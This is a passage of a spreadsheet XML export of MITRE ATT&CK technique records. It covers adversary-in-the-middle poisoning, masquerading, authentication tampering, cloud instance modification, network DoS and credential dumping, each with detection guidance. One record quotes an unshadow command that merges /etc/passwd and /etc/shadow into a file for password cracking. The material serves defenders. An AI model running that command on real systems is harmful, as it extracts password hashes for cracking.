    <n v="1.1000000000000001"/>
    <x v="20"/>
    <s v="Monitor network traffic for anomalies associated with known MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1557.002"/>
    <x v="304"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)_x000a__x000a_Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1557/002"/>
    <d v="2020-10-15T00:00:00"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="1"/>
    <x v="20"/>
    <s v="Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. _x000a__x000a_Consider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1557"/>
    <s v="Jon Sternstein, Stern Security"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1557.001"/>
    <x v="305"/>
    <s v="By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. _x000a__x000a_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_x000a__x000a_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_x000a__x000a_Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)"/>
    <s v="https://attack.mitre.org/techniques/T1557/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="1"/>
    <x v="20"/>
    <s v="Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the &quot;EnableMulticast&quot; DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)_x000a__x000a_Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy._x000a__x000a_Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)"/>
    <s v="Windows"/>
    <s v="Network Traffic: Network Traffic Flow, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1557"/>
    <s v="Eric Kuehn, Secure Ideas; Matthew Demaske, Adaptforward"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1036"/>
    <x v="306"/>
    <s v="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_x000a__x000a_Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)"/>
    <s v="https://attack.mitre.org/techniques/T1036"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1.4"/>
    <x v="12"/>
    <s v="Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect._x000a__x000a_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_x000a__x000a_Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters&quot;\u202E&quot;, &quot;[U+202E]&quot;, and &quot;%E2%80%AE”."/>
    <s v="Containers, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata"/>
    <b v="0"/>
    <m/>
    <s v="Bartosz Jerzman; David Lu, Tripwire; Elastic; Felipe Espósito, @Pr0teus; Nick Carr, FireEye; Oleg Kolesnikov, Securonix"/>
    <m/>
    <s v="Application control by file name or path"/>
    <m/>
  </r>
  <r>
    <s v="T1036.001"/>
    <x v="307"/>
    <s v="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_x000a__x000a_Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature."/>
    <s v="https://attack.mitre.org/techniques/T1036/001"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers."/>
    <s v="Windows, macOS"/>
    <s v="File: File Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1036.004"/>
    <x v="308"/>
    <s v="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_x000a__x000a_Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)"/>
    <s v="https://attack.mitre.org/techniques/T1036/004"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2021-04-24T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows"/>
    <s v="Command: Command Execution, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1036.005"/>
    <x v="309"/>
    <s v="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_x000a__x000a_Adversaries may also use the same icon of the file they are trying to mimic."/>
    <s v="https://attack.mitre.org/techniques/T1036/005"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect._x000a__x000a_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_x000a__x000a_In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users."/>
    <s v="Containers, Linux, Windows, macOS"/>
    <s v="File: File Metadata, Image: Image Metadata, Process: Process Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <s v="Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <s v="Application control by file name or path"/>
    <m/>
  </r>
  <r>
    <s v="T1036.003"/>
    <x v="310"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1036/003"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2020-11-23T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1036.002"/>
    <x v="311"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1036/002"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1036.006"/>
    <x v="312"/>
    <s v="Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system._x000a__x000a_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_x000a__x000a_Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious."/>
    <s v="https://attack.mitre.org/techniques/T1036/006"/>
    <d v="2020-02-10T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, macOS"/>
    <s v="File: File Metadata"/>
    <b v="1"/>
    <s v="T1036"/>
    <s v="Erye Hernandez, Palo Alto Networks"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1556"/>
    <x v="313"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1556"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="2"/>
    <x v="21"/>
    <s v="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_x000a__x000a_Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)_x000a__x000a_Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) _x000a__x000a_Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files._x000a__x000a_Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)_x000a__x000a_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s v="Linux, Network, Windows, macOS"/>
    <s v="File: File Creation, File: File Modification, Logon Session: Logon Session Creation, Module: Module Load, Process: OS API Execution, Process: Process Access, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Chris Ross @xorrior"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1556.001"/>
    <x v="314"/>
    <s v="Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1556/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2"/>
    <x v="21"/>
    <s v="Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)_x000a__x000a_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
    <s v="Windows"/>
    <s v="File: File Modification, Logon Session: Logon Session Creation, Process: OS API Execution, Process: Process Access"/>
    <b v="1"/>
    <s v="T1556"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1556.004"/>
    <x v="315"/>
    <s v="Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices._x000a__x000a_[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
    <s v="https://attack.mitre.org/techniques/T1556/004"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2"/>
    <x v="21"/>
    <s v="Consider verifying the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)_x000a__x000a_Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601)."/>
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1556"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1556.002"/>
    <x v="316"/>
    <s v="Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. _x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1556/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2"/>
    <x v="21"/>
    <s v="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_x000a__x000a_Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)"/>
    <s v="Windows"/>
    <s v="File: File Creation, Module: Module Load, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1556"/>
    <s v="Vincent Le Toux"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1556.003"/>
    <x v="317"/>
    <s v="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_x000a__x000a_Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1556/003"/>
    <d v="2020-06-26T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="2"/>
    <x v="21"/>
    <s v="Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files._x000a__x000a_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s v="Linux, macOS"/>
    <s v="File: File Modification, Logon Session: Logon Session Creation"/>
    <b v="1"/>
    <s v="T1556"/>
    <s v="George Allen, VMware Carbon Black; Scott Knight, @sdotknight, VMware Carbon Black"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1578"/>
    <x v="318"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1578"/>
    <d v="2019-08-30T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="IaaS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1578.002"/>
    <x v="319"/>
    <s v="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_x000a__x000a_Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances."/>
    <s v="https://attack.mitre.org/techniques/T1578/002"/>
    <d v="2020-05-14T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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
    <s v="IaaS"/>
    <s v="Instance: Instance Creation"/>
    <b v="1"/>
    <s v="T1578"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1578.001"/>
    <x v="320"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1578/001"/>
    <d v="2020-06-09T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)_x000a__x000a_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quot;sourceSnapshot&quot;:&lt;/code&gt; parameter pointed to &lt;code&gt;&quot;global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)"/>
    <s v="IaaS"/>
    <s v="Snapshot: Snapshot Creation"/>
    <b v="1"/>
    <s v="T1578"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1578.003"/>
    <x v="321"/>
    <s v="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_x000a__x000a_An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)"/>
    <s v="https://attack.mitre.org/techniques/T1578/003"/>
    <d v="2020-06-16T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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
    <s v="IaaS"/>
    <s v="Instance: Instance Deletion"/>
    <b v="1"/>
    <s v="T1578"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1578.004"/>
    <x v="322"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1578/004"/>
    <d v="2020-06-16T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="IaaS"/>
    <s v="Instance: Instance Modification, Instance: Instance Start, Instance: Instance Stop"/>
    <b v="1"/>
    <s v="T1578"/>
    <s v="Netskope"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1112"/>
    <x v="323"/>
    <s v="Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1112"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-08-13T00:00:00"/>
    <n v="1.2"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <s v="Bartosz Jerzman; David Lu, Tripwire; Travis Smith, Tripwire"/>
    <m/>
    <s v="Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1601"/>
    <x v="324"/>
    <s v="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_x000a__x000a_To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it.  This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device."/>
    <s v="https://attack.mitre.org/techniques/T1601"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1601.002"/>
    <x v="325"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1601/002"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1601"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1601.001"/>
    <x v="326"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). _x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1601/001"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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
    <s v="Network"/>
    <s v="File: File Modification"/>
    <b v="1"/>
    <s v="T1601"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1104"/>
    <x v="327"/>
    <s v="Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult._x000a__x000a_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_x000a__x000a_The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked."/>
    <s v="https://attack.mitre.org/techniques/T1104"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1106"/>
    <x v="328"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1106"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="2"/>
    <x v="13"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Module: Module Load, Process: OS API Execution"/>
    <b v="0"/>
    <m/>
    <s v="Stefan Kanthak"/>
    <m/>
    <m/>
    <b v="0"/>
  </r>
  <r>
    <s v="T1599"/>
    <x v="329"/>
    <s v="Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1599"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized."/>
    <s v="Network"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Firewall, Router ACL"/>
    <m/>
  </r>
  <r>
    <s v="T1599.001"/>
    <x v="330"/>
    <s v="Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks._x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities"/>
    <s v="https://attack.mitre.org/techniques/T1599/001"/>
    <d v="2020-10-19T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization."/>
    <s v="Network"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1599"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1498"/>
    <x v="331"/>
    <s v="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_x000a__x000a_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_x000a__x000a_To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets._x000a__x000a_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_x000a__x000a_For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499)."/>
    <s v="https://attack.mitre.org/techniques/T1498"/>
    <d v="2019-04-17T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="1"/>
    <s v="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
    <s v="Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="0"/>
    <m/>
    <s v="Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1498.001"/>
    <x v="332"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1498/001"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.2"/>
    <x v="1"/>
    <s v="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
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1498"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1498.002"/>
    <x v="333"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1498/002"/>
    <d v="2020-03-02T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.2"/>
    <x v="1"/>
    <s v="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
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Flow, Sensor Health: Host Status"/>
    <b v="1"/>
    <s v="T1498"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1046"/>
    <x v="334"/>
    <s v="Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. _x000a__x000a_Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well."/>
    <s v="https://attack.mitre.org/techniques/T1046"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-09T00:00:00"/>
    <n v="2.200000000000000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
    <s v="Containers, IaaS, Linux, Windows, macOS"/>
    <s v="Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1135"/>
    <x v="335"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1135"/>
    <d v="2017-12-14T00:00:00"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="3"/>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b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1040"/>
    <x v="336"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities."/>
    <s v="https://attack.mitre.org/techniques/T1040"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-02T00:00:00"/>
    <n v="1.2"/>
    <x v="22"/>
    <s v="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s v="Linux, Network, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1095"/>
    <x v="337"/>
    <s v="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_x000a__x000a_ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)_x000a_ Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications."/>
    <s v="https://attack.mitre.org/techniques/T1095"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-10-21T00:00:00"/>
    <n v="2.1"/>
    <x v="6"/>
    <s v="Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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_x000a__x000a_Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels."/>
    <s v="Linux, Network, Windows, macOS"/>
    <s v="Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Ryan Becwar"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1571"/>
    <x v="338"/>
    <s v="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s v="https://attack.mitre.org/techniques/T1571"/>
    <d v="2020-03-14T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="6"/>
    <s v="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s v="Linux, Windows, macOS"/>
    <s v="Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003"/>
    <x v="339"/>
    <s v="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_x000a__x000a_Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well._x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1003"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="2"/>
    <x v="11"/>
    <s v="### Windows_x000a_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_x000a__x000a_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_x000a__x000a_On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process._x000a__x000a_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_x000a__x000a_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_x000a__x000a_### Linux_x000a_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s v="Linux, Windows, macOS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <s v="Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.008"/>
    <x v="340"/>
    <s v="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_x000a__x000a_The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;_x000a_"/>
    <s v="https://attack.mitre.org/techniques/T1003/008"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs."/>
    <s v="Linux"/>
    <s v="Command: Command Execution, File: File Access"/>
    <b v="1"/>
    <s v="T1003"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1003.005"/>
    <x v="341"/>
